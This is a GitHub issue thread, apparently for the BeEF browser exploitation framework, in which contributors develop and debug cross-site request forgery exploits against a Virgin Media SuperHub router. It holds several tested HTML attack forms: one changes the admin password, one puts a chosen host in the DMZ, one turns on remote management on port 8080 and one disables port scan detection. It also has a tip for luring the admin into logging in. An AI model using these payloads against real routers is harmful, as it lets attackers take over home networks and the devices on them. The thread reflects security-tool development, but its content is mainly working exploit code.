Closed n0x00 closed 12 years ago
Thanks for this.
I've added a module for this in commit 771d6d60f9cb077c62e6d163e3ac7e1a8c89576f. Are you able to confirm it works?
You can use 3x backticks (```) to start and end code sections.
Like this
Sweet, I am Sure, but just because you asked and it's been about 6 weeks since I played with it, I'll double-check tonight :)
I'm not sure how I would incorporate it to beef, I'm new to Git and imagine there are people more fluent at coding than me
three backticks! got it :)
It's already incorporated into BeEF :)
I'm closing this issue. Please let me know if the BeEF module works.
hah wicked! here i was making a screeny for you, I'll test it now !
PoC - http://thegentlemanhackersclub.com/verdhehoes_cha_cha_cha/SuperHubCSRF/SuperHub-CSRF.html
Hey, it doesn't want to work with that module mate ...I had tried it a few times and then ran the html created to replicate it. i'll paste in here - this one has a submit value that the other doesn't perhaps that's my fault but below this code works 100% everytime as of this morning (recreating the attack)
<html>
<body>
<form action="http://192.168.100.1/goform/RgSecurity" method="POST">
<input type="hidden" name="NetgearPassword" value="sneaky" />
<input type="hidden" name="NetgearPasswordReEnter" value="sneaky" />
<input type="hidden" name="RestoreFactoryNo" value="0x00" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
Thanks for testing.
Were you logged in to the router?
The submit tag shouldn't make a difference.
The default IP address for the module is http://192.168.1.254/
- which is probably the problem. This has now been fixed. Did you change it to http://192.168.100.1/
when you were testing?
The request used by the BeEF module is exactly the same as the request used in your video, with one exception: it contains two "/" characters, which might also be the issue, ie. http://192.168.100.1//goform/RgSecurity
Try submitting the IP address without the trailing slash, ie: http://192.168.100.1
I did change the address yes, Im sure I was logged in ( I didn't have it going through burp but will do until we get this)
I also tried to append the RGSecurity to RgSecurity.asp to see if that worked but i'll have a tinker
I just locked my self out of it hah :/, I'll keep you posted,
Cool.
I removed the training slash and it works :)
Another note, this whole device is vulnerable to CSRF, i just figured this would be the most used / wanted feature. cool!
Sweet. Thanks for testing.
I've fixed the issue with the duplicate slash /
For BeEF router CSRF modules we generally stick to payloads which:
I'll have a crack at them tonight!
To DMZ a host you see the value '3' is the last octet of the class C (IP)
<html>
<body>
<form action="http://192.168.100.1/goform/RgDmzHost" method="POST">
<input type="hidden" name="cbNetgearWanBlocking" value="0x10" />
<input type="hidden" name="DmzHostIP3" value="3" />
<input type="hidden" name="NetgearMtuSize" value="0" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
-Tested :)
Enable Remote Managment - port 8080 - change the value 8080 for your own port
<html>
<body>
<form action="http://192.168.100.1/goform/RgVMRemoteManagementRes" method="POST">
<input type="hidden" name="NetgearVMRmEnable" value="0x01" />
<input type="hidden" name="NetgearVMRmPortNumber" value="8080" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
Disable all Firewalls and Filtering services
Firewall Features
Ipsec PassThrough
PPTP PassThrough
Multicast
Port Scan Detection
IP Flood Detection
Web Features
Filter Proxy
Filter Cookies
Filter Java Applet
Filter ActiveX
Filter Popup Windows
Block Fragmented IP Packets
sweet.
<html>
<body>
<form action="http://192.168.100.1/goform/RgServices" method="POST">
<input type="hidden" name="cbPortScanDetection" value="" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
-Tested :)
I had tested this at home, it works.
it will only work when the Admin is logged in but if you could redirect web pages to the router perhaps he'll log in just to see WTF. ..can't seem to post HTML in here pre isn't working ?! anyone help ? I'll post the code